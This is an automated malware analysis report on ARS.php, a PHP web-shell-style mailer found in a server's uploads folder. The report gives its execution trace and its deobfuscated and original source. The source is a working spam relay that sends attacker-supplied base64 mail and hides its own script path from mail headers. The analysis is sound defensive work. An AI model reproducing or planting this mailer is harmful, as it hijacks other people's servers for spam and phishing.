PHP Malware Analysis
ARS.php
md5: 559df0c5f52982415ba3d3286b016e9c
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Original)
Environment
- error_reporting (Deobfuscated, Original, Traces)
Input
- _GET (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
$pass = "";
//FORMAT: md5(IMAILpassword);
#----------------------------------------
define("VERSION", "1.0");
ini_set('display_errors', 0);
//1
ini_set('display_startup_errors', 0);
//1
error_reporting(0);
//-1
if (false) {
print json_encode(array("error" => "wrong password"));
exit;
}
if ($_POST['req'] == "test" || $_GET['req'] == "test") {
print json_encode(selfTest());
} elseif ($_POST['req'] == "mail") {
$data = json_decode($_POST['data'], true);
print json_encode(alexusMailer($data));
} else {
print json_encode(array("status" => "BAD", "error" => "bad request"));
}
exit;Execution traces
data/traces/559df0c5f52982415ba3d3286b016e9c_trace-1676247646.3138.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:21:12.211617]
1 0 1 0.000137 393512
1 3 0 0.000341 409256 {main} 1 /var/www/html/uploads/ARS.php 0 0
1 A /var/www/html/uploads/ARS.php 2 $pass = ''
2 4 0 0.000374 409256 define 0 /var/www/html/uploads/ARS.php 5 2 'VERSION' '1.0'
2 4 1 0.000389 409360
2 4 R TRUE
2 5 0 0.000404 409288 ini_set 0 /var/www/html/uploads/ARS.php 6 2 'display_errors' 0
2 5 1 0.000420 409360
2 5 R ''
2 6 0 0.000434 409288 ini_set 0 /var/www/html/uploads/ARS.php 7 2 'display_startup_errors' 0
2 6 1 0.000448 409360
2 6 R ''
2 7 0 0.000461 409288 error_reporting 0 /var/www/html/uploads/ARS.php 8 1 0
2 7 1 0.000474 409328
2 7 R 22527
2 8 0 0.000492 409288 json_encode 0 /var/www/html/uploads/ARS.php 21 1 ['status' => 'BAD', 'error' => 'bad request']
2 8 1 0.000518 409576
2 8 R '{"status":"BAD","error":"bad request"}'
0.000557 330144
TRACE END [2023-02-12 22:21:12.212063]
Generated HTML code
<html><head></head><body>{"status":"BAD","error":"bad request"}</body></html>Original PHP code
<?php
$pass=""; //FORMAT: md5(IMAILpassword);
#----------------------------------------
define("VERSION", "1.0");
ini_set('display_errors',0);//1
ini_set('display_startup_errors',0);//1
error_reporting(0);//-1
if($pass!="" && md5("IMAIL".$_POST['pass'])!=$pass) {
print json_encode(array("error"=>"wrong password"));
exit;
}
if($_POST['req']=="test" || $_GET['req']=="test")
print json_encode(selfTest());
elseif($_POST['req']=="mail") {
$data=json_decode($_POST['data'],true);
print json_encode(alexusMailer($data));
} else {
print json_encode(array(
"status"=> "BAD",
"error" => "bad request"
));
}
exit;
//Самотестирование
function selfTest() {
$test_result=false;
$test_result=function_exists("json_decode") && function_exists("base64_decode") && function_exists("mail");
if($test_result) {
$result=array(
"status"=>"GOOD"
);
} else {
$result=array(
"status"=> "BAD",
"error" => "can't send from this server"
);
}
return $result;
}
//Интеграция с alexusMailer
function alexusMailer($data) {
$hide=array('PHP_SELF'=>'','SCRIPT_FILENAME'=>'','REQUEST_URI'=>'','SCRIPT_NAME'=>'');
while(list($key,)=each($hide)){
$hide[$key]=$_SERVER[$key];
$_SERVER[$key]='/';
}
if(function_exists("mb_orig_mail"))
mb_orig_mail($data['to'],$data['subject'],base64_decode($data['content']),$data['header']);
else
mail($data['to'],$data['subject'],base64_decode($data['content']),$data['header']);
reset($hide);
while(list($key,)=each($hide))
$_SERVER[$key]=$hide[$key];
$result=array(
"status"=>"GOOD"
);
return $result;
}
?>